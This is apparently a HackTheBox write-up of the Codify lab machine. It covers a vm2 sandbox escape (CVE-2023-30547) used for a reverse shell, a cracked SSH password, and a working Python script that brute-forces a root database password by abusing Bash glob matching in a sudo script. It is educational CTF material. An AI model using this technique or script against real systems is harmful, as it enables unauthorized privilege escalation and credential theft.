Codify | HackTheBox Writeup

4 min readNov 23, 2023

About Machine

HackTheBox Codify presented a comprehensive learning opportunity, covering sandbox escape, password cracking, script analysis, and privilege escalation. Initial access involved exploiting a sandbox escape in a NodeJS code runner. Enumeration led to a password hash, enabling privilege escalation from “svc” to “joshua.” A vulnerable MySQL backup script, with weak password comparison logic, was exploited to gain root access. Codify emphasizes the need for a broad skill set, spanning web apps, databases, scripts, authentication, and system administration. Thorough enumeration, lateral thinking, and leveraging multiple techniques are crucial for successful hacking.

Nmap Scan

nmap -sC -sV -p- codify.htb

Pre Enumeration

I configured both web servers to host the identical web application to test our Node.js code. However, when I tried executing a reverse shell JS code, it failed due to restrictions on certain modules.

I also discovered that the server operates within a sandbox environment, utilizing the vm2 library.

While searching for recent vulnerabilities in the vm2 library, I came across one identified as CVE-2023–30547. This vulnerability allows for the circumvention of sandbox restrictions, permitting arbitrary code execution in the host context.

I followed the following adjustments and deployment of the reverse shell proof of concept.

success! I’ve effectively acquired a reverse shell.

In the directory var/www/contact, I found an SQLite database file containing a username and a bcrypt password hash.

Successfully cracked the password. Now that we have the username and password, let’s SSH into the box.

ssh joshua@codify.htb
Password: spongebob1

Got a user flag.

Privilege Escalation

sudo -l

Checking sudo permissions with sudo -l revealed joshua could run this script as root.

Analyzing /opt/scripts/mysql-backup.sh, I found vulnerability in the script is related to how the password confirmation is handled. Read_More

This segment of the script evaluates the user-supplied password (USER_PASS) against the authentic database password (DB_PASS). The vulnerability lies in the use of == within [[ ]] in Bash, which conducts pattern matching instead of a direct string comparison. Consequently, the user input (USER_PASS) is treated as a pattern, and if it contains glob characters like * or ?, it may inadvertently match unintended strings.

For instance, if the actual password (DB_PASS) is password123 and the user inputs * as their password (USER_PASS), the pattern match will succeed because * matches any string, leading to unauthorized access.

This implies that we can systematically attempt to brute-force each character in the DB_PASS.

import string
import subprocess

all_characters = list(string.ascii_letters + string.digits)
final_password = ""
password_found = False

while not password_found:
    for character in all_characters:
        command = f"echo '{final_password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        if "Password confirmed!" in output:
            final_password += character
            break
    else:
        password_found = True

print(final_password)